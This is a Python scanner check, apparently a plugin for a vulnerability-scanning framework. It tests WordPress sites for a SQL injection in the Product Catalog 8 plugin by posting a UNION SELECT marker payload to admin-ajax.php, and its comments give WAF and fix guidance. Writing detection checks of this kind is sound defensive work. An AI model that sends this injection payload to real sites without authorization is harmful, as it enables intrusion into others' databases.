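#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
# __Author__ = Anonymous
# _PlugName_ = WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection
# __Refer___ = https://www.exploit-db.com/exploits/40783/
#
# Scanner check for the SQL injection named above. The probe is a single
# POST whose UNION SELECT returns the constant md5(1); it reads no table
# data and only reports whether the marker hash comes back.
#
# Defender notes:
#   * The request this check sends is a POST to /wp-admin/admin-ajax.php with
#     action=UpdateCategoryList and a selectedCategory value that is not a
#     plain integer. That combination is what a WAF rule or an access-log
#     search should key on.
#   * The fix belongs in the plugin: selectedCategory should be cast to an
#     integer or bound through a prepared statement ($wpdb->prepare).
#     NOTE(review): the plugin source is not part of this file; confirm
#     against the plugin code.
#
# `fingerprint`, `hackhttp` and `security_hole` are not defined here. The
# __main__ block pulls them in with `from dummy import *`; presumably the
# scanner framework injects them when it loads this module. TODO confirm.
# `urllib.urlencode` is the Python 2 location of that function.
import urllib


def assign(service, arg):
    """Tell the framework whether this check applies to a target.

    Returns ``(True, arg)`` when ``service`` equals ``fingerprint.wordpress``.
    For any other service the function falls through and returns ``None``.
    """
    if service == fingerprint.wordpress:
        return True, arg


def audit(arg):
    """Send the marker probe to ``arg`` and report a hit via ``security_hole``.

    ``arg`` is the base URL of the WordPress site. A finding is raised only
    when the response code is 200 and the body contains the MD5 of "1".
    """
    # Drop trailing slashes before appending the path; a base URL such as
    # 'http://127.0.0.1:8080/' would otherwise yield '//wp-admin/...',
    # which some servers and reverse proxies route differently.
    target = arg.rstrip('/') + '/wp-admin/admin-ajax.php'
    post_data = {
        'selectedCategory': '0 UNION SELECT md5(1),2,3,4,5,6',
        'action': 'UpdateCategoryList'
    }
    code, head, body, redirect_url, log = hackhttp.http(
        target, post=urllib.urlencode(post_data))
    # The marker is the computed hash, which never appears in the request
    # itself, so a page that merely echoes the POST data does not match.
    if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in body:
        security_hole(target, log=log)


if __name__ == "__main__":
    # Local self-test against a loopback instance.
    from dummy import *
    audit(assign(fingerprint.wordpress, 'http://127.0.0.1:8080/')[1])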